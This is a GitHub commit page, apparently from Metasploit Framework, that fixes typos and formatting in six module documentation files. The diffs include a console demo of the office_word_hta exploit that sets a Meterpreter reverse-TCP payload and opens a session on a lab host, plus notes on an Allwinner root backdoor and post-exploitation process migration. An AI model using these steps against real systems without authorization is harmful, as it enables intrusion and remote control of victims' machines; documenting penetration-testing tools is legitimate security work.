Skip to content

Commit bde2884

Browse files
committed
Fixes from review
1 parent 75d2b33 commit bde2884

File tree

6 files changed

+28
-26
lines changed

6 files changed

+28
-26
lines changed

documentation/modules/auxiliary/admin/smb/ms17_010_command.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
## Introduction
22

3-
MS17-010 are psexec are two of the most popular exploits against Microsoft Windows. This module bolts the two together.
3+
MS17-010 and psexec are two of the most popular exploits against Microsoft Windows. This module bolts the two together.
44

55
You can run any command as SYSTEM. Note: unlike EternalBlue, kernel shellcode is not used to stage Meterpreter, so you might have to evade your payloads.
66

documentation/modules/auxiliary/gather/shodan_honeyscore.md

Lines changed: 9 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -1,9 +1,9 @@
11
## Introduction
2-
The `shodan_honeyscore` module utilizes the [Shodan](https://www.shodan.io/) API to determine whether or not a server is a honeypot or not.
3-
When setting the module options, we aren't directly requesting `TARGET`, we are requesting the shodan API to analyze `TARGET` and return a honeyscore from 0.0 to 1.0. 0.0 being `not a honeypot` and 1.0 being a `honeypot`. The original website for the honeypot system can be found here: https://honeyscore.shodan.io/.
2+
The `shodan_honeyscore` module utilizes the [Shodan](https://www.shodan.io/) API to determine whether or not a server is a honeypot.
3+
When setting the module options, we aren't directly requesting `TARGET`, we are requesting the Shodan API to analyze `TARGET` and return a honeyscore from 0.0 to 1.0. 0.0 being `not a honeypot` and 1.0 being a `honeypot`. The original website for the honeypot system can be found here: https://honeyscore.shodan.io/.
44

5-
#### NOTE:
6-
In order for this module to function properly, a Shodan API key is needed. You can register for a free acount here: https://account.shodan.io/register
5+
#### NOTE:
6+
In order for this module to function properly, a Shodan API key is needed. You can register for a free account here: https://account.shodan.io/register
77

88
## Verification Steps
99

@@ -12,18 +12,18 @@ In order for this module to function properly, a Shodan API key is needed. You c
1212
3. Do: `set TARGET <targetip>`
1313
4. Do: `set SHODAN_APIKEY <your apikey>`
1414
5. Do: `run`
15-
6. If the API is up, you should recieve a score from 0.0 to 1.0. (1.0 being a honeypot)
15+
6. If the API is up, you should receive a score from 0.0 to 1.0. (1.0 being a honeypot)
1616

1717
## Options
1818

1919
**TARGET**
20-
20+
2121
The remote host to request the API to scan.
22-
22+
2323
**SHODAN_APIKEY**
2424

25-
This is the API key you recieve when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
26-
25+
This is the API key you receive when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
26+
2727

2828
## Scenarios
2929

documentation/modules/exploit/multi/local/allwinner_backdoor.md

Lines changed: 5 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1,11 +1,12 @@
1-
## Introduction
2-
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
3-
Vulnerable OS: all OS images available for Orange Pis,
1+
## Introduction
2+
3+
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
4+
Vulnerable OS: all OS images available for Orange Pis,
45
any for FriendlyARM's NanoPi M1,
56
SinoVoip's M2+ and M3,
67
Cuebietech's Cubietruck +
78
Linksprite's pcDuino8 Uno
8-
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
9+
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
910

1011
This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869). It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.
1112

documentation/modules/exploit/windows/fileformat/office_dde_delivery.md

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,3 @@
1-
21
Module abuses a feature in MS Field Equations that allow an user to execute an arbitrary application.
32

43
## Vulnerable Application

documentation/modules/exploit/windows/fileformat/office_word_hta.md

Lines changed: 3 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
## Introduction
22

3-
Microsoft Office is an office suite of applications, servers, and services developed by Microsoft. Microsoft Office contains Microsoft Word, Microsoft Excel, Microsoft PowerPoint and so on. They can support OLE data integration and Virtusl Basic for Application scripting langauage.
3+
Microsoft Office is an office suite of applications, servers, and services developed by Microsoft. Microsoft Office contains Microsoft Word, Microsoft Excel, Microsoft PowerPoint and so on. They can support OLE data integration and Visual Basic for Application scripting language.
44

55
FireEye detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.
66

@@ -43,7 +43,7 @@ The attack involves a threat actor emailing a Microsoft Word document to a targe
4343
## Demo
4444

4545
```
46-
msf > use exploit/windows/fileformat/office_word_hta
46+
msf > use exploit/windows/fileformat/office_word_hta
4747
msf exploit(office_word_hta) > set payload windows/meterpreter/reverse_tcp
4848
payload => windows/meterpreter/reverse_tcp
4949
msf exploit(office_word_hta) > set lhost 192.168.146.1
@@ -53,7 +53,7 @@ srvhost => 192.168.146.1
5353
msf exploit(office_word_hta) > run
5454
[*] Exploit running as background job.
5555
56-
[*] Started reverse TCP handler on 192.168.146.1:4444
56+
[*] Started reverse TCP handler on 192.168.146.1:4444
5757
[+] msf.doc stored at /Users/wchen/.msf4/local/msf.doc
5858
[*] Using URL: http://192.168.146.1:8080/default.hta
5959
[*] Server started.
@@ -66,4 +66,3 @@ and open it with Microsoft Office Word. You should receive a session:
6666
[*] Sending stage (957487 bytes) to 192.168.146.145
6767
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2017-04-24 16:00:49 -0500
6868
```
69-

documentation/modules/post/windows/manage/archmigrate.md

Lines changed: 10 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -14,20 +14,23 @@ This module was not tested against, but may work against:
1414

1515
## Options
1616

17-
- #### EXE
18-
The executable to start and migrate into. Default: `C:\windows\sysnative\svchost.exe`
17+
**EXE**
1918

20-
- #### FALLBACK
21-
If the selected migration executable does not exist, fallback to a sysnative file. Default: `true`
19+
The executable to start and migrate into. Default: `C:\windows\sysnative\svchost.exe`
2220

23-
- #### IGNORE_SYSTEM
24-
Migrate even if you have SYSTEM privileges. Default: `true`
21+
**FALLBACK**
22+
23+
If the selected migration executable does not exist, fallback to a sysnative file. Default: `true`
24+
25+
**IGNORE_SYSTEM**
26+
27+
Migrate even if you have SYSTEM privileges. Default: `true`
2528

2629

2730
### Verification Steps
2831

2932
1. Start msfconsole
30-
2. Obatin a meterpreter session with an executable meterpreter via whatever method
33+
2. Obtain a meterpreter session with an executable meterpreter via whatever method
3134
3. Do: `use post/windows/manage/archmigrate`
3235
4. Do: `set session #`
3336
5. Do: `run`

0 commit comments

Comments
 (0)